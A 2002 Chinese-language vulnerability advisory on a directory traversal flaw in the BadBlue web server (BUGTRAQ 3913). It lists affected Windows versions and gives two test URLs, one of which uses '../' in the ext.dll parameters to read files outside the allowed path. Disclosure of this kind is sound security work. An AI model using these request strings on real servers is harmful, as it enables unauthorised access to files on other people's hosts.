|
|
Working Resources BadBlue 目录遍历漏洞
发布时间:2002-01-24
更新时间:2002-01-24
严重程度:高
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:3913
受影响系统Deerfield D2Gfx 1.0.2
Working Resources Inc. BadBlue 1.5
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0SP1
- Microsoft Windows NT Server 4.0SP2
- Microsoft Windows NT Server 4.0SP3
- Microsoft Windows NT Server 4.0SP4
- Microsoft Windows NT Server 4.0SP5
- Microsoft Windows NT Server 4.0SP6
- Microsoft Windows NT Server 4.0SP6a
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0SP1
- Microsoft Windows NT Workstation 4.0SP2
- Microsoft Windows NT Workstation 4.0SP3
- Microsoft Windows NT Workstation 4.0SP4
- Microsoft Windows NT Workstation 4.0SP5
- Microsoft Windows NT Workstation 4.0SP6
- Microsoft Windows NT Workstation 4.0SP6a
- Microsoft Windows XP Home
- Microsoft Windows XP Professional 详细描述
Working Resources BadBlue 是一款倾向于共享各种资源开发于WINDOWS环境
下的WEB服务程序,共享文件的时候通过调用'ext.dll'来解析服务。
由于BadBlue的设计缺陷,用户可以读取系统上的任意目录和文件。
如果带有'../'的参数提交给脚本并发送来请求读取OFFICE文档,用户可以绕过
限制的路径,而读取主机上任意文件和目录内容。
测试代码
Strumpf Noir Society (vuln-dev@labs.secureance.com)提供了如下测试方法:
文件读取:
http://target/ext.dll?MfcISAPICommand=LoadPage&page=doc.htx&a0=/,,,/path/allowed.doc&a1=_&a2=2048&a3=8&a4=1
目录遍历:
http://target/ext.dll?MfcISAPICommand=LoadPage&page=doc.htx&a0=/,,,/path/../notallowed.sam&a1=_&a2=2048&a3=8&a4=1
解决方案
尚无
相关信息
Strumpf Noir Society <vuln-dev@labs.secureance.com>.
参考:http://labs.secureance.com/adv/sns2k2-badblue2-adv.txt
相关主页:http://www.badblue.com/index.htm
|
